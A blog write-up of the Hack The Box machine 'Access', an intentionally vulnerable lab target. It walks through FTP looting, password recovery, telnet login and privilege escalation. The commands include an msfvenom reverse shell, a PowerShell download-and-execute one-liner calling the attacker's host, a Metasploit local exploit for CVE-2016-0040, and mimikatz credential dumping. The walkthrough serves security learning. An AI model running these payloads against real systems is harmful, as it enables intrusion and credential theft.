Blog

HTB{ Access }

Mar 2, 2019 | 9 minutes read

Tags: hack the box, windows, runas, mimikatz

If you didn’t know, egre55 has put out a lot of boxes for HTB. Access is another egre55 machine that I thoroughly enjoyed (the other egre55 box I have a write-up for is Reel, which I highly recommend for learning some Active Directory techniques). I was fortunate enough to solve it using what I assume to be the intended method. However, the real learning for me happened on my second time through. Encrypting File System (EFS) was a completely foreign concept to me (not surprising if you know that I have a strong preference for Linux). I enjoyed digging into EFS and what use of EFS means for us as hackers. As usual, @egre55 put out an awesome box!


htb-badge

Scans

masscan

As usual, we start off with a masscan followed by a targeted nmap.

masscan -e tun0 -p0-65535,U:0-65535 --rate 700 -oL scan.10.10.10.105.all 10.10.10.105
═════════════════════════════════════════════════════════════════════════════════════

open tcp 80 10.10.10.98 1538253209
open tcp 23 10.10.10.98 1538253316
open tcp 21 10.10.10.98 1538253330

nmap

nmap -p 21,23,80 -sC -sV -oN nmap.scan 10.10.10.98
══════════════════════════════════════════════════

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Initial Access

Anonymous FTP

Our nmap scan reports that anonymous ftp is allowed, so that’s an easy first step to see what’s being offered by ftp.

We can recursively download the contents of the ftp server using wget. After grabbing the ftp server contents, the command will drop them into a folder of the same name as the hostname used in the command (10.10.10.98 in this case).

wget --no-passive-ftp -r ftp://anonymous:epi@10.10.10.98/

After the wget, we’re left with the following directory structure locally.

find 10.10.10.98/
═════════════════

10.10.10.98/
10.10.10.98/Backups
10.10.10.98/Backups/backup.mdb
10.10.10.98/Engineer
10.10.10.98/Engineer/Access Control.zip

backup.mdb

We can try to unzip Acess Control.zip, however, it is password protected. This leaves us with backup.mdb, which is a Microsoft Access Database. Let’s see if there’s anything of interest there.

First, let’s grab some software that understands how to read an Access database; enter kexi.

KEXI is an open source visual database applications creator, a long-awaited competitor for programs like MS Access or Filemaker.

apt install kexi
-------------8<-------------
kexi-3.1 backup.mdb

After opening backup.mdb with kexi, we’re met with a few prompts. We’ll click through these, generally accepting or nexting whatever popped up until we are able to click Finish. Once the steps to import the project (all those clicks) are complete, we’re greeted with the screen depicted below.

kexi-opened

Within kexi, after some exploration we see the auth_user table and find the follwing usernames and passwords, of which engineer sounds promising.

engineer-password

Access Control.zip

Armed with a likely password, it’s time to revisit the password protected zip file. Linux’s unzip utility complains of an unsupported compression method, so let’s try it with 7-Zip.

7z x Access\ Control.zip
# pass: access4u@security

The zip uncompresses to reveal Access Control.pst, an Outlook PST file.

Access Control.pst

Similar to the previous step, now we need to find some tool that can process PST files on Linux. The pst-utils package has a tool readpst that works very nicely here.

apt install pst-utils
-------------8<-------------
readpst -D -r Access\ Control.pst
readpst options used:
    -D
        Include deleted items in the output.
    -r 
        Changes the output format to Recursive...will put all emails in a file called "mbox"

The command above will create an mbox file that we can read using the cat command. We’re rewarded for our efforts with a username and password!

Access Control.mbox
═══════════════════

-------------8<-------------
Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,
John
-------------8<-------------

telnet Login

Now that we have a username and password, it’s time to login!

#    user: security
#    pass: 4Cc3ssC0ntr0ller

telnet 10.10.10.98

-------------8<-------------

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security> 

\o/ - access level: security

Security to Administrator via Stored Credentials

cmdkey

During enumeration, cmdkey lists out some interesting information, specifically that there are stored credentials that are available for use!

cmdkey /list
════════════

Currently stored credentials:
    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

runas

Even though we can’t dump these credentials or see what they are, we can use them directly with the runas command. There are a lot of ways to leverage this, but a meterpreter shell is pretty simple to execute, so we’ll take that approach. To get the exe to target, we can use a method I really like to transfer files to/from kali and windows.

First generate the exe with msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=12345 -f exe -o meter-rev-12345.exe

Next, spin up an smb server on kali pointed at the directory where the exe resides.

impacket-smbserver epi /root/htb/access

On target, simply copy the file from kali using a normal UNC path.

C:\Users\security> copy \\10.10.14.77\epi\meter-rev-12345.exe
copy \\10.10.14.77\epi\meter-rev-12345.exe
        1 file(s) copied.

Spin up a listener on kali.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 12345
lport => 12345
msf5 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.77:12345

Finally, on target, use the cached credentials to execute the reverse shell.

C:\Users\security> runas /savecred /user:ACCESS\Administrator .\meter-rev-12345.exe

We’ll wrap it up with a quick demonstration of running powershell commands from meterpreter.

meterpreter > getuid
Server username: ACCESS\Administrator

meterpreter > load powershell
Loading extension powershell...Success.

meterpreter > powershell_execute "get-content C:\users\administrator\desktop\root.txt | measure -character"
[+] Command execution completed:

Lines                         Words                                            Characters Property
-----                         -----                                            ---------- --------
                                                                                       32

\o/ - administrator access

Security to SYSTEM via CVE-2016-0040

There is a second way to root this machine. It’s not interesting for the exploit itself, because it’s really just a few metasploit modules strung together. However, it IS interesting for what it teaches. I only found out about this because some people were asking questions about why they couldn’t view root.txt as SYSTEM in NetSec Focus chat. So, while this is a method to get SYSTEM on the box, it is not a method to get root.txt unless someone before us has used the stored credentials discussed above.

Web Delivery

Restarting our process from the point where we logged in through telnet, we can get a meterpreter shell by using the web delivery module.

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set srvport 8081
srvport => 8081
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set lhost tun0
lhost => tun0
msf5 exploit(multi/script/web_delivery) > set lport 12345
lport => 12345
msf5 exploit(multi/script/web_delivery) > exploit -j 

[*] Local IP: http://192.168.100.234:8081/ovuR3ArPYFio
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://10.10.14.77:8081/ovuR3ArPYFio');

With the listener running, we need to copy/paste the powershell command above into the target window.

C:\Users\security\Documents>powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://10.10.14.77:8081/6ORXQO');

After running the above command on target, we receive a meterpreter callback in msfconsole.

CVE-2016-0040

This machine is vulnerable to Microsoft Windows WMI - Recieve Notification Exploit. We can use our existing meterpreter session to get a SYSTEM shell on target using the corresponding metasploit module.

msf5 exploit(multi/script/web_delivery) > use windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
[*] Started reverse TCP handler on 10.10.14.77:4444 
[*] Launching notepad to host the exploit...
[+] Process 2372 launched.
[*] Reflectively injecting the exploit DLL into 2372...
[*] Injecting exploit into 2372...
[*] Exploit injected. Injecting payload into 2372...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 2 opened (10.10.14.77:4444 -> 10.10.10.98:49170) at 2018-10-04 19:10:44 -0500

C:\Users\security> whoami
nt authority\system

\o/ - SYSTEM access

Encrypting File System (EFS)

If our primary goal was strictly flags, a SYSTEM shell on this target wouldn’t actually help us. This is because root.txt is encrypted using EFS. EFS is a part of NTFS and it provides the ability to encrypt files and folders, instead of a whole drive.

Even with a SYSTEM shell, we can’t view the contents of root.txt as illustrated below.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.

C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt NT AUTHORITY\SYSTEM:(I)(F)
         BUILTIN\Administrators:(I)(F)
         ACCESS\Administrator:(I)(F)

Successfully processed 1 files; Failed processing 0 files

A box creator with a penchant for trolling may have created a root.txt whose contents are “Access is denied.” (take notes incidrthreat) However, this is not the case, and the cipher command can show us that it is indeed encrypted.

C:\Users\Administrator\Desktop>cipher
cipher

 Listing C:\Users\Administrator\Desktop\
 New files added to this directory will not be encrypted.

E root.txt

Files encrypted with EFS can only be decrypted by using the RSA private key(s) matching the previously used public key(s). The stored copy of the user’s private key is ultimately protected by the user’s logon password.

Mimikatz

This technique only works if someone else has actually utilized the stored credentials with runas or something similar. We’ll look at mimikatz run against a freshly reverted box and against one where we used the stored credentials.

Upgrade Shell

Keeping with our meterpreter theme for this machine, we’ll upgrade our SYSTEM cmd shell to a meterpreter shell.

First a quick sessions -u 2 will net us a 32-bit meterpreter shell.

msf exploit(windows/local/ms16_014_wmi_recv_notif) > sessions -u 2 

-------------8<-------------

  meterpreter x86/windows  NT AUTHORITY\SYSTEM @ ACCESS     10.10.14.77:4433 -> 10.10.10.98:49161 (10.10.10.98)

-------------8<-------------

Then, we need a 64-bit meterpreter to run mimikatz, so we can use the payload_inject module to accomplish that.

msf exploit(windows/local/ms16_014_wmi_recv_notif) > use windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set session 3
msf5 exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/payload_inject) > set lhost tun0
msf5 exploit(windows/local/payload_inject) > set lport 12346
msf5 exploit(windows/local/payload_inject) > exploit

-------------8<-------------

[*] Meterpreter session 4 opened (10.10.14.77:12346 -> 10.10.10.98:49195) at 2018-10-05 09:28:04 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

After Fresh Revert

This is what mimikatz is able to gather for us on a freshly reverted instance of the box.

meterpreter > load kiwi
Loading extension kiwi...

-------------8<-------------

meterpreter > creds_all 
[+] Running as SYSTEM
[*] Retrieving all credentials

-------------8<-------------

security  ACCESS  4Cc3ssC0ntr0ller

-------------8<-------------

After Intended Privesc

After performing a command using the stored credentials like we did in the runas section, we can clearly see the Administrator account’s password.

meterpreter > creds_all 
[+] Running as SYSTEM
[*] Retrieving all credentials

-------------8<-------------

Administrator  ACCESS  55Acc3ssS3cur1ty@megacorp
security       ACCESS  4Cc3ssC0ntr0ller

-------------8<-------------

Telnet Login as Admin

With the Administrator’s password, we can log in via telnet again and check out root.txt without issue.

#    user: Administrator
#    pass: 55Acc3ssS3cur1ty@megacorp

telnet 10.10.10.98

-------------8<-------------

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>powershell -c "cat desktop\root.txt | measure -character"

Lines                   Words                              Characters Property              
-----                   -----                              ---------- --------              
                                                                   32                       

There we have it, if the credentials have been used recently, this method would lead to a flag, but that definitely was not the case for some folks.


I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.

epi-htb-badge

Additional Resources

  1. Encrypting File System

comments powered by Disqus